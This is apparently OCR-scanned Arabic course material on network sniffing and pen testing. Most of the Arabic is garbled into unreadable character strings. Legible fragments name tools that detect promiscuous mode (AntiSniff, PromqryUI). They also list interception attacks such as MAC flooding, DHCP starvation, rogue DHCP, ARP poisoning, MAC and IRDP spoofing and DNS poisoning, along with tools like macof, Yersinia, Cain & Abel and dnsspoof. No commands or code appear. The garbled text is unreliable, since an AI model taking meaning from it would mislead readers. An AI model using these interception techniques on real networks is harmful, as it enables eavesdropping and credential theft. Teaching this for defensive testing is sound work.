.promiscuously ^ jL jjill j Ethernet/IP u j^^ if- ' sbi ^ AntiSniff 

^jja jll c Lijja^ll <jl£ lij L* ^j^i3 CjI jUlkVl ^1 jj| a aa^a AntiSniff 6 nons witched ^Jc- J-**^ ^ s>a 

c> g^ljji aj^j y-L Uij .promiscuous mode 

• DNS tests 

• Operating-system-specific tests 

• Network and machine latency tests 



http : //www . micro soft . com/ 
U Ai^j ji .promiscuous mode t^j^ 4£f£JI ^Lkj ^\ lJU£&)} c*U PromqryUI ^^Vl 
^U^l jl£ lij .promiscuous mode f^jll ^ lU*^ ^->U^lj ^U*j modern managed Windows system 

.^Uajll ^ Jaxj Sniffing Ajw J] j^4i ^ ^ 'promiscuous mode ^jll ^ ^h^j ^ 




- 1 l-*J 



Systems To Guer^ 



L|_*r, Results 



r - - - - - -- ■=■ 



•Qygfy Status 



done rwgrfJvc 



FrornqryLPl is a security tool from 
Microsoft that can be used to 
detect network interfaces that are 
running in promiscuous mode 



rfiftLiip ccattomain 

- :i » ~ ^ i 
in fttwuoeNanv 



»tfe*Rj PftOi-1000 MT 
\E.T— -*VE 



tCOAWC 



C cross; c-n 

cuTi*H3y NOT *nac i-d 
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Sniffing Pen Testing 8.9 



dibLiaxJ! Liajl liuiSlj .Sniffing (i'j^VI J 1 *I^V CjIj^VIj ^ j^JI CjLj£ij t<^pUI ^a&lLJI U>.^U ^ c^jVi 

^Ai^JjaixJl Jc Sniffing (jlj^^ jW-*^ ^^>^.V ^""^ U*^ ■ * 4_xJal<Jl JJ^*^ L>* W%f^ 

i^jJal\ J ^jVI djL* Jc J jj^aJI J^J Ai^jjauJI a£jJo3I J Aj^L^xJI C5 1c Sniffing ^ li<Au ^ U£ 

jlkl j/i^ ^ ciljj .Sniffing 1— iI&^a .ua Ai^lauJI a£jjuJI 4 jffi ^WTi l_a jjoj 
lij U ^j^j til^Loij l_a jjoj Sniffing i^jlkl jLjlkl .Sniffing t^yinn Jll jlii^V Sniffing ^ j?** 
J j>**ll ^luu Sniffing $ J&>\ J-£^ .(interception attacks) o^lj^VI CjU^a jl Sniffing c> £jj ls^ 4£^ll 

, jLjall jl^all <J^J (j-a <£jjuJl JJ^ (i^^ 

.iSijiSI jjj* VPN jSSL ^Jl 

rogue sniffing ci^j ^^>*j 
J rogue DNS j rogue DHCP ^» > ^USSI - 

.jift^l g ^11 <J*ij U»Ldj sniffing ^ ^ ^ sI£Ia^ 4^ ^j^-^t ^> ^ji ^ll^j tiijli JjljlkVI jLii^U ^-^Jl 

jUlkl CjI jiaaJI ^juli* J] . j^-A^^ lW-^I jjUaill ^AjJaj li& j ,a£jjoJI sniffing ^ 4i£-<uJI JjjuJI j <Jj^ 
;4_ilU3l Sniffing i^jlkVl jtf^l <«- >l ^ Iaaj U jc^ .^.^ 1 ^ <J£Jdjj ^I^j ^1 jlkVI ^.1^1 L5 lc til^cLaaj ^^Ij j^^-Vl 

MAC Flooding k& :1 S J^I ^ 

CjULiJI Jl ffi > ^ jj^aLJI m\a\\ ialL<JI ls^\ ^^W^ ' ^ j^' ^ (jl lLli^ 'failopen mode j^l ci^^ 

.macof j Yersinia 
DHCP starvation ^12 :2 SjkaJI ^ 

^ Sjjal <^H(JI DHCP f ^ udj^ iUiLojl ^^jj t3_nx^ 3Jaij Ak, ^Uv^ll MAC u^j^ t° DHCP ^-A^ ^ 
^U. ^Uj ^XoxJI DHCP ^W^ 3 ^j^- dijuolill ^^ja j^l^lt jli JiA dj^. lij 

.Gobbler j Dhcpstarv ^1 j^i ^l^i^U DHCP starvation ^l^j .DHCP rouge 

rogue server l»i2 :3 Sjl^l 

ip qiJlic> DHCP cjUIU <jUi^VIj A^fdll J rogue DHCP ?iL J^-^ ci^j^ c> rogue server djU^A iiiii 

ARP Poisoning ^ : 4 SjkaJI 4. 

dIa Jxij jl ^jWimi lil . jl^J ip jjAj dii^ MAC u^j^ j&^l ARP Table $ Jj^ 

Ufasoft SNIFj ^WinArpAttacker 'Cain & Abel ^1 e 1 ^ 1 ^> <> e^ 31 

MAC spoofing *tj*! :5 Sjkkll ^ 

lij JjS ^ 4£jj^3U Jl^aJ MAC u' Jj^- ,^j>^1 Ailkj MAC u' (spoof) lP^jI SlSLa^ JjU. 

jl^a c^IjLj jaUsuII J^Lk ^ CjLdlLJl jl <Li^ jjll ftj^l Jc J jj^a jib a^jH aj! jj aa] <ijl£^J tilU^i ^Uill Jc I j^IS Cln£ 

.SMAC £j! j^i ^I^L^I JjjL 
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IRDP spoofing ^ :6 Sj^l *i 

m 2uc jill Jc < LuiaJ ) Jj spoofed IRDP router advertisement J^j J^-jj (j&J^ c> IRDP spoofing ^ 
jl£ lit .V ^ I advertisement messages J^ J-^ ^ ^ Cjbl^l jj j\ jll jl^ ^15 lij U ji^i 

t q > ^T^ l J j ^-jIa^a jI/j 'passive sniffing 'Dos c ^jJal jSVI jl^JI jj*jj ^IS jjj! jll 

(MITM) 
DNS spoofing 1*42 :7 SjkaJ! *t 

Aja^al i <^ jj fclc] jo 6 jUo j& DNS Spoofing .arpspoof/dnsspoof ^jj£j ^l^ki^U DNS Spoofing ^ 

(JjS (J^iixJl JP <jl jjc £xa AjL^JjojVI (JjuJJJj ^i^J^all DNS L , A (J^J^S f £ ^ 6 (* J?£^ ^ J -~ ^ 6 ^ *J J trt C5^) 
Jc Jali^Jl ^Tjn tdjL^gJl j-d ^ jill 11a t . g a\\ £3 Jj 4_i^jJa3l jj o^lcj JU3Lj .4 > ^1 ^Uail 4_ilxi3l AA a^LujVl <J jj^ j 

IDS/IPS 
cache poisoning li2 :8 Sjl^aJl *k 

c_jjj3I ^q > ^^ J Cf uo£ J jj ^SLJI cjtal^j ^jL ^illj 3 j^ > ^ 1 jl^ J^jji jj cal^ 3 cache poisoning ^ 

Proxy Server DNS Poisoning li2 :9 SjIaaJI ± 

t^jj proxy server ^j^t i> ^ J .Sniffing ^ jUi^V Proxy Server DNS Poisoning ^3 

.^1^*1] C;r ^jjJI {SL 4 j^ » ^ t ^ .^^jjJI ^Uaj J primary DNS entry ^ rogue DNS 

gitUll JSJjSjj : io SjLaJt 4. 

■ (<<n ? J (jj '^A^VI CjI^suII AjJaxjj lg_L<i L_fl^Jlj 



